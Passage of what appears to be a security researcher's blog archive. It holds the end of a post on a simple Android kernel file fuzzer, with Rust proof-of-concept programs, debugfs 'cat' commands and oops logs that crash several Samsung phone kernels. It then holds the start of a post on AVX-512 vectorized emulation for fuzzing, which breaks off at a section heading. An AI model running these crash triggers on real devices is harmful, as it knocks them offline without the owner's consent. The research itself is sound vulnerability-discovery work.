Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Lets set it into single threaded mode so we don’t have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.

Back to fuzzing

So when fuzzing the last file we saw touched was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout before a crash.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make this better

  • Make it perform random ioctl() calls
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists

In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.

Wall of Shame

Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.

G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)

PoC

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    let fn = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(fn) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)

not root caused, just run the fuzzer

[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
sp : ee457d20  ip : 00000000  fp : ee457d54
[c0] r10: ed859210  r9 : c0c833e4  r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>]    lr : [<62655722>]    psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/usb_serial0/readstatus

or

cat /sys/kernel/debug/usb_serial1/readstatus

or

cat /sys/kernel/debug/usb_serial2/readstatus

or

cat /sys/kernel/debug/usb_serial3/readstatus

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/mdp/xlog/dump

J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)

cat /sys/kernel/debug/rpm_master_stats

J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)

not root caused, just run the fuzzer

Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (Febuary 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction of a multipart series. It is to give a high level overview without really deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Why

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track state of code deeper than just code coverage itself, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further a full system snapshot can be used instead of a single application and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512 compare instructions in SIMD typically yielded all ones in a given lane if the comparision was true, or all zeroes if it was false. In AVX-512 comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant value with in our example vpsubd. This broadcasts the memory pointed to to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Lets talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs memory such that we can access them all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get it’s own entire blog. For now let’s just assume a flat, infinite memory model where we can just multiply by 16.

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ than we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this load/storing to different addresses for us. This is done with a base and an offset, with 32-bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location. Now we cannot run a AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of the VM#0 and compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Lets go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Conditionally jump to end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magicially load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 1 1
Zmm31 .next .end .next .next

Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 0 1
Zmm31 .next2 .end .end .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1
Zmm31 .end .end .end .end

Branch summary

So we saw branches will disable VMs which do not follow VM #0. When VMs are disabled all modifications to their register states or memory states are blocked by hardware. The kmask mechanism allows us to keep performance up and not use different JITs based on different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.

Exceptions/faults

